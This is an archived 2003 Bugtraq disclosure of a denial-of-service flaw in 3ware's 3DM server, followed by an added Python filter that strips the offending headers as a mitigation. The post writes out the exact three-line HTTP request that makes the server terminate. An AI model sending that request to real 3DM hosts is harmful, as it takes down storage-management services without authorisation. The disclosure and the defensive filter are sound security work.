3Ware 3DM denial of service attack

From: Neulinger, Nathan (nneul@umr.edu)
Date: 01/30/03

    Date: Thu, 30 Jan 2003 09:57:37 -0600
    From: "Neulinger, Nathan" <nneul@umr.edu>
    To: <bugtraq@securityfocus.org>

    I've reported this to 3ware at least twice, and never received any
    response. Previously I didn't have a test case other than "run a nessus
    scan against the host". I've narrowed it down to a reproducible minimum
    test case now.

    If you connect to 3dm port 1080 on either Linux or Windows and send:

    GET / HTTP/1.1
    Host: foo
    Accept-Charset: bar

    3dm server will terminate immediately.

    Other 3dm problems - it flips out and refuses to accept a login if you
    have ANY cookies sent. This screws you over if you have a sitewide
    .domain.edu cookie for example.

    -- Nathan

    Nathan Neulinger EMail: nneul@umr.edu
    University of Missouri - Rolla Phone: (573) 341-4841
    Computing Services Fax: (573) 341-4216
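
One possible mitigation for the two problems reported above, shown as an added example that is not part of the original post or of 3ware's code: a filter for a proxy placed in front of 3DM that drops Accept-Charset and Cookie headers before forwarding the request. It assumes that removing those headers avoids both behaviours; the function name and the sample requests are constructed for illustration.

```python
from __future__ import annotations

# Headers named in the report: Accept-Charset (server terminates) and
# Cookie (login refused). Assumption: stripping them avoids both problems.
BLOCKED_HEADERS = {b"accept-charset", b"cookie"}


def sanitize_request_head(raw: bytes) -> tuple[bytes, list[str]]:
    """Return (cleaned request, names of the headers that were removed)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete request head")
    lines = head.split(b"\r\n")
    kept = [lines[0]]            # request line is forwarded unchanged
    removed: list[str] = []
    skipping = False
    for line in lines[1:]:
        # Obsolete folded continuation: belongs to the previous header,
        # so it is dropped or kept together with that header.
        if line[:1] in (b" ", b"\t"):
            if not skipping:
                kept.append(line)
            continue
        name, colon, _ = line.partition(b":")
        if not colon:
            raise ValueError("malformed header line")
        skipping = name.strip().lower() in BLOCKED_HEADERS
        if skipping:
            removed.append(name.strip().decode("latin-1"))
        else:
            kept.append(line)
    return b"\r\n".join(kept) + sep + body, removed


# Constructed sample: the request from the report, with CRLF line endings.
REPORTED = b"GET / HTTP/1.1\r\nHost: foo\r\nAccept-Charset: bar\r\n\r\n"
# Constructed sample: a site-wide cookie sent as a folded, lower-case header.
WITH_COOKIE = (b"GET /login HTTP/1.1\r\nHost: foo\r\n"
               b"cookie: a=1;\r\n\tb=2\r\nUser-Agent: x\r\n\r\nBODY")

if __name__ == "__main__":
    for sample in (REPORTED, WITH_COOKIE):
        cleaned, dropped = sanitize_request_head(sample)
        print(dropped, cleaned)
```

Logging the returned header names on the proxy also gives a record of which clients send requests that would have triggered either problem.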
